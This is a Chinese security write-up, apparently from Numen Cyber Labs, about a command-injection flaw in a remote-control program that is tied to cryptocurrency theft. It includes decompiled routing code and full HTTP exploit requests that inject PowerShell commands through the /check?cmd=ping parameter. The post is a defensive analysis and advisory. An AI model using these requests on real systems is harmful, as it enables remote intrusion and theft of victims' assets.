Web3安全事件:黑客利用远程控制软件窃取加密货币

起因

最近许多Web3的加密货币持有者,在使用某远程控制软件期间,发生多起加密货币丢失事件。下图为其中一起事件。

Web3安全事件:黑客利用远程控制软件窃取加密货币

黑客钱包地址

0xbb3fd383d1c5540e52ef0a7bcb9433375793aeaf

Web3安全事件:黑客利用远程控制软件窃取加密货币

Web3安全事件:黑客利用远程控制软件窃取加密货币

这不得不联想到去年某远程控制软件http服务爆过cid泄漏+命令注入漏洞CNVD-2022-10270/CNVD-2022-03672;受害者每次启动该软件时,会自动随机开启一个大于40000的端口号作为http服务,在/check路由中,当参数cmd的值以ping或者nslookup开头时可以执行任意命令,攻击者可以下发c2 agent长期潜伏在受害者系统中观察。

影响版本

个人版 for Windows <= 11.0.0.33162

简约版 <= V1.0.1.43315

分析

Web3安全事件:黑客利用远程控制软件窃取加密货币

看一下login.cgi

Web3安全事件:黑客利用远程控制软件窃取加密货币

v5 =(__int64 (__fastcall *)())operatornew(0x50ui64);  v55 = v5;  v54 =15i64;  v53 =0i64;  v51[0]=0;  sub_1400F0690(v51,"login.cgi",9ui64);  v6 = sub_140E2D6BC(v5, v51);  v57 =&off_1410D3B20;  v58 =(char(__fastcall *)(__int64, __int64))sub_140E1EE50;  v59 = v52;  v60 = a1;  v61 =&v57;  v66 =(_QWORD *)v6;  if( v6 )  {    v7 = v6 +8+*(int*)(*(_QWORD *)(v6 +8)+4i64);    (*(void(__fastcall **)(__int64))(*(_QWORD *)v7 +8i64))(v7);  }  sub_140E2D85C(a1 +55,&v66,&v57);  LOBYTE(v8)=1;  sub_1400EEDC0(v51, v8,0i64);  v56 =&v57;  v9 =(__int64 (__fastcall *)())operatornew(0x50ui64);  v55 = v9;  v54 =15i64;  v53 =0i64;  v51[0]=0;  sub_1400F0690(v51,(void*)"cgi-bin/login.cgi",0x11ui64);  v10 = sub_140E2D6BC(v9, v51);  v57 =&off_1410D3B20;  v58 =(char(__fastcall *)(__int64, __int64))sub_140E1EE50;  v59 = v52;  v60 = a1;  v61 =&v57;  v66 =(_QWORD *)v10;  if( v10 )  {    v11 = v10 +8+*(int*)(*(_QWORD *)(v10 +8)+4i64);    (*(void(__fastcall **)(__int64))(*(_QWORD *)v11 +8i64))(v11);  }  sub_140E2D85C(a1 +55,&v66,&v57);  LOBYTE(v12)=1;  sub_1400EEDC0(v51, v12,0i64);  v56 =&v57;  v13 =(__int64 (__fastcall *)())operatornew(0x50ui64);  v55 = v13;  v54 =15i64;  v53 =0i64;  v51[0]=0;  sub_1400F0690(v51,(void*)"cgi-bin/rpc",0xBui64);  v14 = sub_140E2D6BC(v13, v51);  v57 =&off_1410D3B20;  v58 = sub_140E1C954;  v59 = v52;  v60 = a1;  v61 =&v57;  v66 =(_QWORD *)v14;  if( v14 )  {    v15 = v14 +8+*(int*)(*(_QWORD *)(v14 +8)+4i64);    (*(void(__fastcall **)(__int64))(*(_QWORD *)v15 +8i64))(v15);  }

定位到cgi-bin/rpc

Web3安全事件:黑客利用远程控制软件窃取加密货币

获得以下路由

v63 =(*(__int64 (__fastcall **)(_QWORD))(**(_QWORD **)(a1 +8)+104i64))(*(_QWORD *)(a1 +8));    sub_140320D80(      (int)&qword_1414049C0,      1,      (int)"..\includes\libsunloginclient\client\HttpDecideClientType.cpp",      (int)"CHttpDecideTcpClientType::DecideClient",      205,      "[Acceptor][HTTP] new RC HTTP connection %s,%s, plugin:%s, session:%s",      v63);    if((unsignedint)sub_140101DB0(v116,"login")      && strcmp(v61,"express_login")      && strcmp(v61,"cgi-bin/login.cgi")      && strcmp(v61,"log")      && strcmp(v61,"cgi-bin/rpc")      && strcmp(v61,"transfer")      && strcmp(v61,"cloudconfig")      && strcmp(v61,"getfastcode")      && strcmp(v61,"assist")      && strcmp(v61,"cloudconfig")      && strcmp(v61,"projection")      && strcmp(v61,"getaddress")      && strcmp(v61,"sunlogin-tools"))      ...              sub_1400F05E0(v116);        goto LABEL_168;      }    }    if(!(unsignedint)sub_140101DB0(v116,"login")      ||!(unsignedint)sub_140101DB0(v116,"control")      ||!strcmp(v61,"express_login")      ||!strcmp(v61,"cgi-bin/login.cgi")      ||!strcmp(v61,"cgi-bin/rpc")      ||!strcmp(v61,"desktop.list")      ||!strcmp(v61,"cloudconfig")      ||!strcmp(v61,"check")      ||!strcmp(v61,"transfer")      ||!strcmp(v61,"getfastcode")      ||!strcmp(v61,"assist")      ||!strcmp(v61,"micro-live/enable")      ||!strcmp(v61,"projection")      ||!strcmp(v61,"getaddress"))    {      v103 =*(_QWORD *)(a1 +8);

根据网上披露的漏洞信息,先从cgi-bin/rpc路由获取的身份验证CID,可以看到action参数进行区分功能。

Web3安全事件:黑客利用远程控制软件窃取加密货币

当action为verify-haras时,返回verify_string。

if(!(unsignedint)sub_140101DB0(v131,"verify-haras"))  {    sub_1400F0690(Src,"{"__code":0,"enabled":"1","verify_string":"",0x2Bui64);    LOBYTE(v22)=1;    v23 =(*(__int64 (__fastcall **)(_QWORD,char*, __int64))(**(_QWORD **)(*(_QWORD *)(a1 +416)+288i64)+144i64))(            *(_QWORD *)(*(_QWORD *)(a1 +416)+288i64),            v125,            v22);    sub_1400EEE40(Src, v23,0i64,-1i64);    sub_1400F05E0(v125);    sub_1400EEC60(Src,"","code":0} ",0xCui64);    v73 =1;    CxxThrowException(&v73,(_ThrowInfo *)&stru_1412F7B30);  }

当action为login-type时,返回受害者设备相关信息。

if(!(unsignedint)sub_140101DB0(v131,"login-type"))  {    sub_1405ACBA0(v93);    v16 ="0";    if((*(unsigned __int8 (__fastcall **)(_QWORD))(**(_QWORD **)(*(_QWORD *)(a1 +416)+288i64)+112i64))(*(_QWORD *)(*(_QWORD *)(a1 +416)+288i64)))    ...    memset(Buffer,0,sizeof(Buffer));    sub_140150A60(      Buffer,      "{"__code":0,"use_custom":%d,"code":0,"version":"%s","isbinding":%s,"isinstalled":%s,"isprojection""      ":%s,"platform":"%s","mac":"%s","request_need_pwd":"%s","accept_request":"1","support_file":"1""      ","disable_remote_bind":"%s"} ");    if( Buffer[0])    {      do        ++v6;      while( Buffer[v6]);      v4 = v6;    }    sub_1400F0690(Src, Buffer, v4);    v72 =1;    CxxThrowException(&v72,(_ThrowInfo *)&stru_1412F7B30);  }

除了以上还有fast-loginbind-request

再来看check路由,攻击者可以通过ping或nslookup进行构造恶意命令实现远程命令执行

Web3安全事件:黑客利用远程控制软件窃取加密货币

getaddress路由可以获取到映射在外网固定端口的https服务地址,那这个地址是可以被网络资产搜索引擎抓取或被攻击者扫描到,所以攻击路径不局限于内网。

Web3安全事件:黑客利用远程控制软件窃取加密货币

利用过程

每次启动时,会在40000+随机一个rpc接口的端口

Web3安全事件:黑客利用远程控制软件窃取加密货币

第一步,获取受害者的CID。

GET /check?cmd=ping../../../../../../../../../windows/system32/WindowsPowerShell/v1.0/powershell.exe+whoami+/all HTTP/1.1Host: 10.211.55.3:49716Cache-Control: max-age=0Upgrade-Insecure-Requests: 1Cookie:CID=Pvqsv5f5QDs8vYotYsUEFvTkqJuKeZISUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close
Web3安全事件:黑客利用远程控制软件窃取加密货币

第二步,添加CID进行身份认证Cookie:CID=Pvqsv5f5QDs8vYotYsUEFvTkqJuKeZIS并在受害者电脑执行任意命令。

GET /check?cmd=ping../../../../../../../../../windows/system32/WindowsPowerShell/v1.0/powershell.exe+whoami+/all HTTP/1.1Host: 10.211.55.3:49716Cache-Control: max-age=0Upgrade-Insecure-Requests: 1Cookie:CID=Pvqsv5f5QDs8vYotYsUEFvTkqJuKeZISUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close

Web3安全事件:黑客利用远程控制软件窃取加密货币

/check?cmd=ping../../../../../../../../../windows/system32/WindowsPowerShell/v1.0/powershell.exe+ipconfig

Web3安全事件:黑客利用远程控制软件窃取加密货币

查看受害者的系统文件

check?cmd=ping../../../../../../../../../windows/system32/WindowsPowerShell/v1.0/powershell.exe+dir+c:/

Web3安全事件:黑客利用远程控制软件窃取加密货币

总结:

随着web3的持续发展,由于web3基础架构的隐匿性以及数字资产的高价值,黑客由传统的网络安全盗取数据转变在web3的生态里,盗取用户数字资产。很多黑客开始利用0day/1day来完成攻击目标设施,包括服务器,个人主机,钱包APP,移动客户端等,通过入侵这些系统,最终窃取用户的数字资产的目的,这里建议用户需要及时给系统打补丁,及时更新系统内的软件,不点击不明来源的连接,做好系统隔离,密钥需要在隔离系统中存放以及使用,不随便装不明来源的软件等。Numen 提供溯源,威胁情报,追币等服务,我们有行业顶级web3安全专家以及全球顶级的传统网络安全专家,持续研究,跟踪web3安全领域的问题,为您的数字资产安全保驾护航。

Web3安全事件:黑客利用远程控制软件窃取加密货币

Numen 官网
https://numencyber.com/ 
GitHub
https://github.com/NumenCyber
Twitter
https://twitter.com/@numencyber
Medium
https://medium.com/@numencyberlabs
LinkedIn
https://www.linkedin.com/company/numencyber/

原文始发于微信公众号(Numen Cyber Labs):Web3安全事件:黑客利用远程控制软件窃取加密货币

版权声明:admin 发表于 2023年4月14日 下午4:58。
转载请注明:Web3安全事件:黑客利用远程控制软件窃取加密货币 | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...